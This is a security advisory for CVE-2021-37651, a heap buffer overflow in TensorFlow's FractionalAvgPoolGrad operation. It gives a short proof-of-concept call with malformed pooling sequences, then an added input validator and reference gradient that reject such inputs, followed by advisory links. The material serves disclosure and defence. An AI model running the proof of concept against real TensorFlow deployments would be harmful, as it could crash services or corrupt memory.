CVE-2021-37651: Heap buffer overflow in `FractionalAvgPoolGrad`
The implementation of `tf.raw_ops.FractionalAvgPoolGrad` can be tricked into accessing data outside the bounds of heap-allocated buffers, as the following proof of concept shows:

```python
import numpy as np
import tensorflow as tf

# Pooling sequences that are inconsistent with the declared input shape
# (negative and non-monotonic boundaries, a zero-sized batch) drive the
# gradient kernel's index computation out of the allocated buffer.
tf.raw_ops.FractionalAvgPoolGrad(
    orig_input_tensor_shape=[0, 1, 2, 3],
    out_backprop=np.array([[[[541], [541]], [[541], [541]]]]),
    row_pooling_sequence=[0, 0, 0, 0, 0],
    col_pooling_sequence=[-2, 0, 0, 2, 0],
    overlapping=True)
```
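The following is an added example, not TensorFlow's code and not the upstream fix: an input validator that rejects the kind of inconsistent arguments shown in the proof of concept, paired with a numpy reference gradient that refuses to index anything until the check passes. It assumes an NHWC layout and the sequence contract stated in the docstring.

```python
import numpy as np

def check_fractional_avg_pool_grad_inputs(orig_input_tensor_shape, out_backprop,
                                         row_pooling_sequence, col_pooling_sequence):
    """Reasons these inputs are unsafe to index with (empty list if they are fine).
    Assumed contract (illustration, not TensorFlow's own check): shape is [N, H, W, C],
    out_backprop is [N, out_rows, out_cols, C], and each pooling sequence holds
    out_dim + 1 non-negative, non-decreasing boundaries no larger than the input extent."""
    shape = [int(d) for d in orig_input_tensor_shape]
    grad = np.asarray(out_backprop)
    if len(shape) != 4 or grad.ndim != 4:
        return ["orig_input_tensor_shape needs 4 entries and out_backprop must be 4-D"]
    problems = []
    if any(d <= 0 for d in shape):
        problems.append("every entry of orig_input_tensor_shape must be positive")
    if grad.shape[0] != shape[0] or grad.shape[3] != shape[3]:
        problems.append("batch/channel dims of out_backprop must match the input shape")
    for name, seq, out_dim, in_dim in (
        ("row_pooling_sequence", row_pooling_sequence, grad.shape[1], shape[1]),
        ("col_pooling_sequence", col_pooling_sequence, grad.shape[2], shape[2]),
    ):
        seq = [int(s) for s in seq]
        if len(seq) != out_dim + 1:
            problems.append(f"{name} needs {out_dim + 1} boundaries, got {len(seq)}")
        if any(s < 0 for s in seq):
            problems.append(f"{name} contains a negative boundary")
        if any(b < a for a, b in zip(seq, seq[1:])):
            problems.append(f"{name} is not non-decreasing")
        if seq and max(seq) > in_dim:
            problems.append(f"{name} runs past the input extent {in_dim}")
    return problems

def fractional_avg_pool_grad(orig_input_tensor_shape, out_backprop,
                             row_pooling_sequence, col_pooling_sequence, overlapping):
    """Reference gradient: each out_backprop cell is spread evenly over its region."""
    problems = check_fractional_avg_pool_grad_inputs(
        orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence)
    if problems:
        raise ValueError("; ".join(problems))
    n, h, w, c = (int(d) for d in orig_input_tensor_shape)
    grad = np.asarray(out_backprop, dtype=np.float64)
    result = np.zeros((n, h, w, c))
    extra = 1 if overlapping else 0  # overlapping regions also cover the end boundary
    for r in range(grad.shape[1]):
        r0, r1 = row_pooling_sequence[r], min(row_pooling_sequence[r + 1] + extra, h)
        for q in range(grad.shape[2]):
            c0, c1 = col_pooling_sequence[q], min(col_pooling_sequence[q + 1] + extra, w)
            area = (r1 - r0) * (c1 - c0)
            if area > 0:  # an empty region (equal boundaries) receives nothing
                result[:, r0:r1, c0:c1, :] += grad[:, r:r + 1, q:q + 1, :] / area
    return result
```

Running the check on the advisory's proof-of-concept arguments reports the zero-sized batch, the negative column boundary and the non-monotonic sequence before any buffer is touched.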
References
- github.com/advisories/GHSA-hpv4-7p9c-mvfr
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-564.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-762.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-273.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/0f931751fb20f565c4e94aa6df58d54a003cdb30
- github.com/tensorflow/tensorflow/security/advisories/GHSA-hpv4-7p9c-mvfr
- nvd.nist.gov/vuln/detail/CVE-2021-37651